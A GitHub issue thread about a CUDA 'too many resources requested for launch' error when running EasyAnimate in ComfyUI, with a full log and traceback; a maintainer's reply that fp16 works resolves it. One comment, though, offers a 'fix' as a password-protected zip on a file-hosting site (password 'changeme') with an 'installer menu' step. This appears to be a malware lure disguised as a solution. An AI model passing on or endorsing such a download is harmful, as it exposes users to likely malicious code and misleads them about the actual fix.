### ISSUE TITLE
RuntimeError: CUDA error: too many resources requested for launch

### ISSUE THREAD

**Issue by ProKSMT** [aigc-apps/EasyAnimate#102]
V100 32G
ComfyUI
can't run even in 512 x 72

LOG:

got prompt
[rgthree] Using rgthree's optimized recursive execution.
Load Vae.
### unexpected keys: 56;
[] ['loss.discriminator.main.0.bias', 'loss.discriminator.main.0.weight', 'loss.discriminator.main.11.bias', 'loss.discriminator.main.11.weight', 'loss.discriminator.main.2.weight', 'loss.discriminator.main.3.bias', 'loss.discriminator.main.3.num_batches_tracked', 'loss.discriminator.main.3.running_mean', 'loss.discriminator.main.3.running_var', 'loss.discriminator.main.3.weight', 'loss.discriminator.main.5.weight', 'loss.discriminator.main.6.bias', 'loss.discriminator.main.6.num_batches_tracked', 'loss.discriminator.main.6.running_mean', 'loss.discriminator.main.6.running_var', 'loss.discriminator.main.6.weight', 'loss.discriminator.main.8.weight', 'loss.discriminator.main.9.bias', 'loss.discriminator.main.9.num_batches_tracked', 'loss.discriminator.main.9.running_mean', 'loss.discriminator.main.9.running_var', 'loss.discriminator.main.9.weight', 'loss.logvar', 'loss.perceptual_loss.lin0.model.1.weight', 'loss.perceptual_loss.lin1.model.1.weight', 'loss.perceptual_loss.lin2.model.1.weight', 'loss.perceptual_loss.lin3.model.1.weight', 'loss.perceptual_loss.lin4.model.1.weight', 'loss.perceptual_loss.net.slice1.0.bias', 'loss.perceptual_loss.net.slice1.0.weight', 'loss.perceptual_loss.net.slice1.2.bias', 'loss.perceptual_loss.net.slice1.2.weight', 'loss.perceptual_loss.net.slice2.5.bias', 'loss.perceptual_loss.net.slice2.5.weight', 'loss.perceptual_loss.net.slice2.7.bias', 'loss.perceptual_loss.net.slice2.7.weight', 'loss.perceptual_loss.net.slice3.10.bias', 'loss.perceptual_loss.net.slice3.10.weight', 'loss.perceptual_loss.net.slice3.12.bias', 'loss.perceptual_loss.net.slice3.12.weight', 'loss.perceptual_loss.net.slice3.14.bias', 'loss.perceptual_loss.net.slice3.14.weight', 'loss.perceptual_loss.net.slice4.17.bias', 'loss.perceptual_loss.net.slice4.17.weight', 'loss.perceptual_loss.net.slice4.19.bias', 'loss.perceptual_loss.net.slice4.19.weight', 'loss.perceptual_loss.net.slice4.21.bias', 'loss.perceptual_loss.net.slice4.21.weight', 'loss.perceptual_loss.net.slice5.24.bias', 'loss.perceptual_loss.net.slice5.24.weight', 'loss.perceptual_loss.net.slice5.26.bias', 'loss.perceptual_loss.net.slice5.26.weight', 'loss.perceptual_loss.net.slice5.28.bias', 'loss.perceptual_loss.net.slice5.28.weight', 'loss.perceptual_loss.scaling_layer.scale', 'loss.perceptual_loss.scaling_layer.shift']
Load Sampler.
loaded 3D transformer's pretrained weights from /mnt/workspace/project/ComfyUI/models/EasyAnimate/EasyAnimateV4-XL-2-InP/transformer ...
### unexpected keys: 0;
[]
### attn1 Parameters: 317.4336 M
Loading checkpoint shards: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00,  1.59s/it]
Loading pipeline components...: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 7/7 [00:06<00:00,  1.16it/s]
You have disabled the safety checker for <class 'EasyAnimate.easyanimate.pipeline.pipeline_easyanimate_multi_text_encoder_inpaint.EasyAnimatePipeline_Multi_Text_Encoder_Inpaint'> by passing `safety_checker=None`. Ensure that you abide to the conditions of the Stable Diffusion license and do not expose unfiltered results in services or applications open to the public. Both the diffusers team and Hugging Face strongly recommend to keep the safety filter enabled in all public facing circumstances, disabling it only for use-cases that involve analyzing network behavior or auditing its results. For more information, please have a look at https://github.com/huggingface/diffusers/pull/254 .
!!! Exception during processing!!! CUDA error: too many resources requested for launch
CUDA kernel errors might be asynchronously reported at some other API call, so the stacktrace below might be incorrect.
For debugging consider passing CUDA_LAUNCH_BLOCKING=1
Compile with `TORCH_USE_CUDA_DSA` to enable device-side assertions.

Traceback (most recent call last):
  File "/mnt/workspace/project/ComfyUI/execution.py", line 152, in recursive_execute
    output_data, output_ui = get_output_data(obj, input_data_all)
  File "/mnt/workspace/project/ComfyUI/execution.py", line 82, in get_output_data
    return_values = map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True)
  File "/mnt/workspace/project/ComfyUI/execution.py", line 75, in map_node_over_list
    results.append(getattr(obj, func)(**slice_dict(input_data_all, i)))
  File "/mnt/workspace/project/ComfyUI/custom_nodes/EasyAnimate/comfyui/comfyui_nodes.py", line 595, in process
    sample = pipeline(
  File "/mnt/data/anaconda3/envs/comfyUI/lib/python3.9/site-packages/torch/utils/_contextlib.py", line 116, in decorate_context
    return func(*args, **kwargs)
  File "/mnt/workspace/project/ComfyUI/custom_nodes/EasyAnimate/easyanimate/pipeline/pipeline_easyanimate_multi_text_encoder_inpaint.py", line 998, in __call__
    latents_outputs = self.prepare_latents(
  File "/mnt/workspace/project/ComfyUI/custom_nodes/EasyAnimate/easyanimate/pipeline/pipeline_easyanimate_multi_text_encoder_inpaint.py", line 657, in prepare_latents
    video_bs = self.vae.encode(video_bs)[0]
  File "/mnt/data/anaconda3/envs/comfyUI/lib/python3.9/site-packages/diffusers/utils/accelerate_utils.py", line 46, in wrapper
    return method(self, *args, **kwargs)
  File "/mnt/workspace/project/ComfyUI/custom_nodes/EasyAnimate/easyanimate/models/autoencoder_magvit.py", line 290, in encode
    h = self.encoder(x)
  File "/mnt/data/anaconda3/envs/comfyUI/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1553, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/mnt/data/anaconda3/envs/comfyUI/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1562, in _call_impl
    return forward_call(*args, **kwargs)
  File "/mnt/workspace/project/ComfyUI/custom_nodes/EasyAnimate/easyanimate/vae/ldm/models/omnigen_enc_dec.py", line 254, in forward
    next_frames = self.single_forward(x[:, :, i: i + self.mini_batch_encoder, :, :], None, None)
  File "/mnt/workspace/project/ComfyUI/custom_nodes/EasyAnimate/easyanimate/vae/ldm/models/omnigen_enc_dec.py", line 209, in single_forward
    x = self.conv_in(x)
  File "/mnt/data/anaconda3/envs/comfyUI/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1553, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/mnt/data/anaconda3/envs/comfyUI/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1562, in _call_impl
    return forward_call(*args, **kwargs)
  File "/mnt/data/anaconda3/envs/comfyUI/lib/python3.9/site-packages/accelerate/hooks.py", line 169, in new_forward
    output = module._old_forward(*args, **kwargs)
  File "/mnt/workspace/project/ComfyUI/custom_nodes/EasyAnimate/easyanimate/vae/ldm/modules/vaemodules/common.py", line 108, in forward
    return super().forward(x)
  File "/mnt/data/anaconda3/envs/comfyUI/lib/python3.9/site-packages/torch/nn/modules/conv.py", line 608, in forward
    return self._conv_forward(input, self.weight, self.bias)
  File "/mnt/data/anaconda3/envs/comfyUI/lib/python3.9/site-packages/torch/nn/modules/conv.py", line 603, in _conv_forward
    return F.conv3d(
RuntimeError: CUDA error: too many resources requested for launch
CUDA kernel errors might be asynchronously reported at some other API call, so the stacktrace below might be incorrect.
For debugging consider passing CUDA_LAUNCH_BLOCKING=1
Compile with `TORCH_USE_CUDA_DSA` to enable device-side assertions.

Prompt executed in 87.19 seconds

using example v2v workflow
![image](https://github.com/user-attachments/assets/ecf0e556-ef7a-451c-8e48-73b22af5ac0f)

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bubbliiiing** [comment]
fp16 is ok

**Comment by ProKSMT** [comment]
OK, it works.
